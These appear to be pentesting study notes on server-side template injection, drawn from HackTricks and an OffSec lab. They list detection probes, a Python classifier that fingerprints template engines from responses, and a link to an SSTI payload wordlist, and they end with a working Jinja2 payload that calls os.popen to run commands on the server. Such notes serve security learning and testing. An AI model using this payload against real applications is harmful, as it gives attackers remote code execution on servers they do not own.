
Server-Side Template Injection

https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html
https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti
offsec pg - layla

Start by sending simple probe values into the template, analyse the server's response and look for:

  • Thrown errors, revealing the vulnerability and potentially the template engine.
  • Absence of the payload in the reflection, or parts of it missing, implying the server processes it differently than regular data.
  • Plaintext Context: Distinguish from XSS by checking whether the server evaluates template expressions (e.g., {{7*7}} or ${7*7}).
  • Code Context: Confirm the vulnerability by altering the input parameter. For instance, with http://vulnerable-website.com/?greeting=data.username, change the greeting value to see whether the server's output is dynamic or fixed: greeting=data.username}}hello returning the username shows the input is evaluated as part of the template.
{{7*7}}
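The checklist above is easy to apply by hand for one parameter, but the same logic can be run over every probe/response pair you capture. The following is an added example, not part of these notes or of the linked references: a small classifier that applies the four checks (error thrown, probe reflected verbatim, arithmetic evaluated, probe absent). The engine error signatures, the extra {{7*'7'}} differentiator probe and the sample responses are my own constructed assumptions for illustration.

```python
# Added example (not from the notes above): a small classifier that applies the
# SSTI checklist to probe/response pairs captured during a test.
# Engine error signatures and sample responses are constructed for illustration.

# Probe -> strings an evaluating engine would print back. The first two probes
# are the ones from the notes; {{7*'7'}} is a common differentiator: Jinja2
# repeats the string ('7777777'), while Twig coerces it and prints '49'.
PROBES = {
    "{{7*7}}": ["49"],
    "${7*7}": ["49"],
    "{{7*'7'}}": ["7777777", "49"],
}

# Substrings that fingerprint an engine when it throws on a malformed probe
# (taken from the engines' public error class and message names).
ERROR_SIGNATURES = {
    "Jinja2": ["jinja2.exceptions", "TemplateSyntaxError"],
    "Twig": ["Twig\\Error\\SyntaxError"],
    "FreeMarker": ["FreeMarker template error"],
}


def classify(probe, response):
    """Return {'finding': ..., 'engine': ...} for one probe/response pair.

    finding is one of:
      'error'     - the server threw; the error text names the engine
      'reflected' - probe echoed untouched, so the input is treated as data
      'evaluated' - the arithmetic result came back, so the input reached an engine
      'absent'    - probe neither echoed nor evaluated; the server rewrote or dropped it
    """
    for engine, needles in ERROR_SIGNATURES.items():
        if any(needle in response for needle in needles):
            return {"finding": "error", "engine": engine}
    if probe in response:
        return {"finding": "reflected", "engine": None}
    for expected in PROBES.get(probe, []):
        if expected in response:
            engine = None
            if probe == "{{7*'7'}}":
                # '7777777' is Jinja2 behaviour; '49' rules Jinja2 out but
                # could be Twig or another engine that coerces strings.
                engine = "Jinja2" if expected == "7777777" else "not-Jinja2"
            return {"finding": "evaluated", "engine": engine}
    return {"finding": "absent", "engine": None}


def run_checklist(responses):
    """Classify every captured probe/response pair and return the findings."""
    return {probe: classify(probe, body) for probe, body in responses.items()}


# Constructed sample responses, as if a greeting page echoed each probe.
SAMPLE_RESPONSES = {
    "{{7*7}}": "<p>Hello 49!</p>",
    "${7*7}": "<p>Hello ${7*7}!</p>",
    "{{7*'7'}}": "<p>Hello 7777777!</p>",
    "{{7*7": "jinja2.exceptions.TemplateSyntaxError: unexpected end of template",
}

if __name__ == "__main__":
    for probe, result in run_checklist(SAMPLE_RESPONSES).items():
        print(f"{probe:12} -> {result['finding']:9} engine={result['engine']}")
```

The 'evaluated' check is a plain substring match, so pick operands whose product does not already appear on the page (for example 13*17 instead of 7*7) before trusting a hit, and treat the engine guess from a single probe as a hypothesis to confirm with the engine's own syntax.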

Use this wordlist to test the template further:
https://github.com/payloadbox/ssti-payloads

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}